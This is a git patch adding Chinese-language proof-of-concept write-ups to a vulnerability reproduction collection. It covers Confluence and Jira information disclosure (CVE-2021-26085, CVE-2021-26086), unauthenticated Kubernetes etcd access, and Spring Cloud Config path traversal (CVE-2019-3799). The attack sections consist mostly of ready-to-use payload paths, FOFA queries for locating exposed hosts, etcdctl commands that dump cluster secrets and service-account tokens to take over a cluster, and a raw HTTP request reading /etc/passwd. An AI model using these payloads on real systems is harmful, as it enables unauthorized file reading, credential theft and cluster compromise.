From b9388f7b513017d4d8c8cd0933d369620cea580f Mon Sep 17 00:00:00 2001 From: Threekiii <472361400@qq.com> Date: Mon, 17 Jul 2023 17:09:21 +0800 Subject: [PATCH] =?UTF-8?q?=E6=9B=B4=E6=96=B0=E6=BC=8F=E6=B4=9E?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- README.md | 6 ++ ...sian Confluence 敏感信息泄露 CVE-2021-26085.md | 35 +++++++++++ .../Atlassian Jira 敏感信息泄露 CVE-2021-26086.md | 38 ++++++++++++ 云安全漏洞/K8s etcd未授权访问.md | 61 +++++++++++++++++++ ...pring Cloud Config 目录遍历漏洞 CVE-2019-3799.md | 31 ++++++++++ 5 files changed, 171 insertions(+) create mode 100644 Web应用漏洞/Atlassian Confluence 敏感信息泄露 CVE-2021-26085.md create mode 100644 Web应用漏洞/Atlassian Jira 敏感信息泄露 CVE-2021-26086.md create mode 100644 云安全漏洞/K8s etcd未授权访问.md create mode 100644 开发框架漏洞/Spring Cloud Config 目录遍历漏洞 CVE-2019-3799.md diff --git a/README.md b/README.md index 17f80d8..3547acd 100644 --- a/README.md +++ b/README.md @@ -4,6 +4,8 @@ ## 0x01 项目导航 + * 微信小程序反编译 + * 蜜罐技术研究与识别 - CMS漏洞 * 74cms v4.2.1 v4.2.129 后台getshell漏洞 @@ -204,6 +206,7 @@ * Atlassian Bitbucket 登录绕过漏洞 * Atlassian Confluence doenterpagevariables.action 远程命令执行漏洞 CVE-2021-26084 * Atlassian Confluence preview SSTI模版注入漏洞 CVE-2019-3396 + * Atlassian Confluence 敏感信息泄露 CVE-2021-26085 * Atlassian Jira cfx 任意文件读取漏洞 CVE-2021-26086 * Atlassian Jira com.atlassian.jira 敏感信息泄漏 CVE-2019-8442 * Atlassian Jira groupuserpicker 用户信息枚举漏洞 CVE-2019-8449 @@ -211,6 +214,7 @@ * Atlassian Jira Mobile Plugin SSRF漏洞 CVE-2022-26135 * Atlassian Jira Server 及 Data Center 信息泄露漏洞 CVE-2020-14179 * Atlassian Jira ViewUserHover.jspa 用户信息泄露漏洞 CVE-2020-14181 + * Atlassian Jira 敏感信息泄露 CVE-2021-26086 * Atlassian Questions For Confluence 身份认证绕过漏洞 CVE-2022-26138 * AVCON6 系统管理平台 download.action 任意文件下载漏洞 * AVCON6 系统管理平台 org_execl_download.action 任意文件下载漏洞 @@ -480,6 +484,7 @@ - 云安全漏洞 * K8s API Server未授权命令执行 + * K8s etcd未授权访问 - 其他漏洞 * Microsoft Word 远程代码执行漏洞 CVE-2023-21716 @@ -500,6 +505,7 @@ * PHPUnit eval-stdin.php 远程命令执行漏洞 CVE-2017-9841 * Rails Accept 任意文件读取漏洞 CVE-2019-5418 * Rails sprockets 任意文件读取漏洞 CVE-2018-3760 + * Spring Cloud Config 目录遍历漏洞 CVE-2019-3799 * Spring Cloud Function SPEL 远程命令执行漏洞 * XStream SSRF 反序列化漏洞 CVE-2020-26258 * XStream 任意文件删除 反序列化漏洞 CVE-2020-26259 diff --git a/Web应用漏洞/Atlassian Confluence 敏感信息泄露 CVE-2021-26085.md b/Web应用漏洞/Atlassian Confluence 敏感信息泄露 CVE-2021-26085.md new file mode 100644 index 0000000..eb325dd --- /dev/null +++ b/Web应用漏洞/Atlassian Confluence 敏感信息泄露 CVE-2021-26085.md @@ -0,0 +1,35 @@ +# Atlassian Confluence 敏感信息泄露 CVE-2021-26085 + +## 漏洞描述 + +Confluence 是一个专业的企业知识管理与协同软件,也可以用于构建企业 wiki。使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。该漏洞不是任意文件读取,只能读取一些 confluence 的配置文件,影响有限。 + +参考链接: + +- https://jira.atlassian.com/browse/CONFSERVER-67893 + +## 漏洞影响 + +``` +version < 7.4.10 +7.5.0 ≤ version < 7.12.3 +``` + +## FOFA + +``` +app="ATLASSIAN-Confluence" +``` + +## 漏洞复现 + +poc: + +``` +/s/123cfx/_/;/WEB-INF/web.xml +/s/123cfx/_/;/WEB-INF/decorators.xml +/s/123cfx/_/;/WEB-INF/classes/seraph-config.xml +/s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.properties +/s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml +``` + diff --git a/Web应用漏洞/Atlassian Jira 敏感信息泄露 CVE-2021-26086.md b/Web应用漏洞/Atlassian Jira 敏感信息泄露 CVE-2021-26086.md new file mode 100644 index 0000000..b8537b1 --- /dev/null +++ b/Web应用漏洞/Atlassian Jira 敏感信息泄露 CVE-2021-26086.md @@ -0,0 +1,38 @@ +# Atlassian Jira 敏感信息泄露 CVE-2021-26086 + +## 漏洞描述 + +JIRA是Atlassian公司出品的项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。 + +参考链接: + +- https://jira.atlassian.com/browse/JRASERVER-72695 + +## 漏洞影响 + +``` +version < 8.5.14 +8.6.0 ≤ version < 8.13.6 +8.14.0 ≤ version < 8.16.1 +``` + +## FOFA + +``` +app="ATLASSIAN-JIRA" +``` + +## 漏洞复现 + +poc: + +``` +/s/cfx/_/;/WEB-INF/web.xml +/s/cfx/_/;/WEB-INF/decorators.xml +/s/cfx/_/;/WEB-INF/classes/seraph-config.xml +/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties +/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml +/s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml +/s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties +``` + diff --git a/云安全漏洞/K8s etcd未授权访问.md b/云安全漏洞/K8s etcd未授权访问.md new file mode 100644 index 0000000..31f464d --- /dev/null +++ b/云安全漏洞/K8s etcd未授权访问.md @@ -0,0 +1,61 @@ +# K8s etcd未授权访问 + +## 漏洞描述 + +etcd 是云原生架构中重要的基础组件。etcd 在微服务和 Kubernates 集群中不仅可以作为服务注册于发现,还可以作为 key-value 存储的中间件,为 k8s 集群提供底层数据存储,保存了整个集群的状态。 + +在 K8s 集群初始化后,etcd 默认就以 pod 的形式存在,可以执行如下命令进行查看,etcd 组件监听的端口为 2379,并且对外开放。 + +``` +kubectl get pods -A | grep etcd +``` + +在 etcd 的配置文件 /etc/kubernetes/manifests/etcd.yaml 中,--client-cert-auth 默认为 true,这意味着访问 etcd 服务需要携带 cert 进行认证。 + +如果目标在启动 etcd 的时候没有开启证书认证选项,且 2379 端口直接对外开放的话,则存在 etcd 未授权访问漏洞。 + +etcdctl 下载地址:https://github.com/etcd-io/etcd + +## 漏洞复现 + +### 查看是否存在未授权访问 + +访问以下链接,查看是否存在未授权访问。 + +``` +https://your-ip:2379/version +------------- +返回如下则存在未授权访问: +{etcdserver: "3.4.3", etcdcluster: "3.4.0"} +``` + +``` +https://your-ip:2379/v2/keys +------------- +返回如下则存在未授权访问: +{"action":"get","node":{"dir":true,"nodes":...}} +``` + +### 查找 Token 接管集群 + +由于 Service Account 关联了一套凭证,存储在 Secret 中。因此我们可以过滤 Secret,查找具有高权限的 Secret,然后获得其 token 接管 K8s 集群。 + +``` +#查找所有的 secret +./etcdctl --insecure-transport=false --insecure-skip-tls-verify --endpoints=https://your-ip:2379/ get / --prefix --keys-only|sort|uniq| grep secret +``` + +以 `/registry/secrets/kube-system/dashboard-admin-token-c7spp` 为例,查看指定 secret 保存的证书和 token: + +``` +#查找指定 secret 保存的证书和 token +./etcdctl --insecure-transport=false --insecure-skip-tls-verify --endpoints=https://your-ip:2379/ get /registry/secrets/kube-system/dashboard-admin-token-c7spp +``` + +最终的 token 为 `token?` 和 `\#kubernetes.io/service-account-token` 之间的部分。可以使用 curl 验证 token 的有效性: + +``` +curl --header "Authorization: Token" -X GET https://your-ip:6443/api -k +``` + +然后,就可以使用 token 登录 dashboard 或者远程命令管理 K8s。 \ No newline at end of file diff --git a/开发框架漏洞/Spring Cloud Config 目录遍历漏洞 CVE-2019-3799.md b/开发框架漏洞/Spring Cloud Config 目录遍历漏洞 CVE-2019-3799.md new file mode 100644 index 0000000..92f479f --- /dev/null +++ b/开发框架漏洞/Spring Cloud Config 目录遍历漏洞 CVE-2019-3799.md @@ -0,0 +1,31 @@ +# Spring Cloud Config 目录遍历漏洞 CVE-2019-3799 + +## 漏洞描述 + +由于 spring-cloud-config-server 模块未对传入路径进行安全限制,攻击者可以利用多个 `..%252f` 进行目录遍历,查看服务器其他路径的敏感文件,造成敏感信息泄露。 + +## 漏洞影响 + +``` +Spring Cloud Config 2.1.0 to 2.1.1 +Spring Cloud Config 2.0.0 to 2.0.3 +Spring Cloud Config 1.4.0 to 1.4.5 +``` + +## 漏洞复现 + +``` +GET /foo/default/master/..%252F..%252F..%252F..%252Fetc%252fpasswd HTTP/1.1 +Host: your-ip:8888 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +DNT: 1 +Connection: close +Upgrade-Insecure-Requests: 1 +``` + +## 漏洞修复 + +Spring 官方最新版本已经对 Spring Cloud Config 目录遍历漏洞进行了修复,下载地址:https://github.com/spring-cloud/spring-cloud-config/releases \ No newline at end of file